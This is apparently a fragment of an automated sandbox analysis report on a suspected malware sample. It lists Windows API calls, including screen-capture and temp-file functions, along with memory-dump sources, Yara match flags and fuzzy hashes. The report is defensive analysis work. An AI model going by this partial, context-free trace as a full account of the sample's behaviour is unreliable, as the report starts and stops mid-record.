                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                                                                                                                                                                                • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00410672,0248FE60), ref: 024908D2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                                                • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                                                • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                                                • Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                                                                                                                                                                                • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                                                • Instruction ID: b9dde2cb8ec5e47059e822cff3b1413f3dc4673ccaa64d593e325bcd1b1b7be9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61D1C7322085A24EDB3D4A39847003FFFF1AA621A530D479FD8F7CA6C6EE24D595D660
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                • Instruction ID: 5ac7f2a9e59a8602cade0463bed8eecf15c6b405b6f14f5b51fff65f5b8fc904
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C39136721090A34AE76E463E847513FFFE1DA612A530A079FD4F3CA2C5EF24D5A5DA20
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                • Instruction ID: 69c8c12ab4cd9361c634d874c37384b1242b2d74bc424703cf95b13c0a97f286
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E9152721090E34AEB69467E853413FFFE1DA622A530A07AFD4F2CA2C5FF24C565D620
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                • Instruction ID: 1b0e5a1432efdb955494ef33638bab052ade4cd867fb28aa86128775c2a79699
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 649131722090A30AEB79463D857413FFEE19A611A570A079FE4F3CF2C5EF24D655D620
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                                                • Instruction ID: 5f9d72d340cd0d95e81e904500351da7244a860c49d46dc476b9cfacc41c856c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B615435E00B04D6DB386A2888B0BBF6399AF75A08F44041FE893DBFD4D715D982CB55
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                                                • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                • Instruction ID: 40fef48657afa0c07b793ed553198580fd63280cf07076a7908ae453cb7e4604
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B8152722090E34AEB79467E847413FFFE15A621A630A079FD4F3CB2C5EF248665D620
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                • Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                • Instruction ID: b549e255c62728a56516a23b7752254fdb945a80926b464c3fcfcc8976473489
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B511277720104247D618CA3ED8B42BBE795FBE6228B2C567FD0514F758EB22E145D600
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215370096.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, Offset: 009BA000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9ba000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                • Instruction ID: c84488a78f40dbbc30e99ee956911ed66730eec576a4fac8746fc7dbaaebbb15
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80117C72340100AFD744DE55DD81FE677EAEB89330B298065ED08CB356E679EC01C7A0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                • Instruction ID: 34064763689ac3de6fc2931be55773beff4606bcf56ef1d504eadd77b2d196bf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E01F272A306008FDF21EF20C905BBF33E5FB86306F0550A6D90A97381E370A8498B80
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040214A
                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00402151
                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(00646464), ref: 00402164
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00402178
                                                                                                                                                                                                                                                                • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00402191
                                                                                                                                                                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
                                                                                                                                                                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0040227F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                                                                                                                                                                                • String ID: Tahoma
                                                                                                                                                                                                                                                                • API String ID: 3832963559-3580928618
                                                                                                                                                                                                                                                                • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                                                • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 004025CD
                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 004025F2
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00402619
                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                                                                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402731
                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00402738
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0040273F
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00402754
                                                                                                                                                                                                                                                                • SetCapture.USER32(?), ref: 004027A1
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 004027D5
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                                                                                                                                                                                                                                • GetKeyState.USER32(0000001B), ref: 004027F8
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 0040280D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
